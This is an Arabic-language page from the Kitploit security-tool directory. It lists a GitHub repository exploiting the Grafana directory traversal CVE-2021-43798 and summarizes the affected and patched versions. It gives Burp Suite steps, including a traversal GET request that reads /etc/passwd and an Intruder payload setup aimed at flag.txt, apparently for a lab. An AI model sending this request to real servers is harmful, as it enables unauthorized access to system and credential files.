Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2021-43798 — استغلال ثغرة اجتياز الدليل في Grafana (CVE-2021-43798) مع تكامل Burp Suite وأتمتة التحميل للوصول إلى الملفات المحلية على الخوادم الضعيفة. | Kitploit
أدوات/GitHubGitHub/iris288/cve-2021-43798
تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويبجمع المعلوماتاختبار الاختراق
GitHubiris288/cve-2021-43798

CVE-2021-43798

استغلال ثغرة اجتياز الدليل في Grafana (CVE-2021-43798) مع تكامل Burp Suite وأتمتة التحميل للوصول إلى الملفات المحلية على الخوادم الضعيفة.

عرض المستودع
منذ 2 سنواتلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2021-43798

إصدارات Grafana من 8.0.0-beta1 إلى 8.3.0 (باستثناء الإصدارات المصلحة) معرضة لاجتياز الدليل، مما يسمح بالوصول إلى الملفات المحلية.

Grafana هي منصة مفتوحة المصدر للمراقبة والرصد. إصدارات Grafana من 8.0.0-beta1 إلى 8.3.0 (باستثناء الإصدارات المصلحة) معرضة لاجتياز الدليل، مما يسمح بالوصول إلى الملفات المحلية. مسار URL الضعيف هو: <grafana_host_url>/public/plugins//، حيث <plugin-id> هو معرف المكون الإضافي لأي مكون إضافي مثبت. لم يكن Grafana Cloud ضعيفًا في أي وقت. يُنصح المستخدمون بالترقية إلى الإصدارات المصلحة 8.0.7 و8.1.8 و8.2.7 أو 8.3.1. يحتوي GitHub Security Advisory على مزيد من المعلومات حول مسارات URL الضعيفة وطرق التخفيف وجدول الإفصاح.

باستخدام Burp Suite

أرسل طلب GET إلى Repeater

GET /public/plugins/alertlist/../../../../../../../../etc/passwd HTTP/1.1

ثم أرسله إلى Intruder

GET /public/plugins/alertlist/../../../../../../../../etc/passwd HTTP/1.1

باستخدام Sniper للهجوم

Payload copy from github https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Directory%20Traversal

Paypload processing Match [{FILE}] replace with {flag.txt}

تنزيل الأداة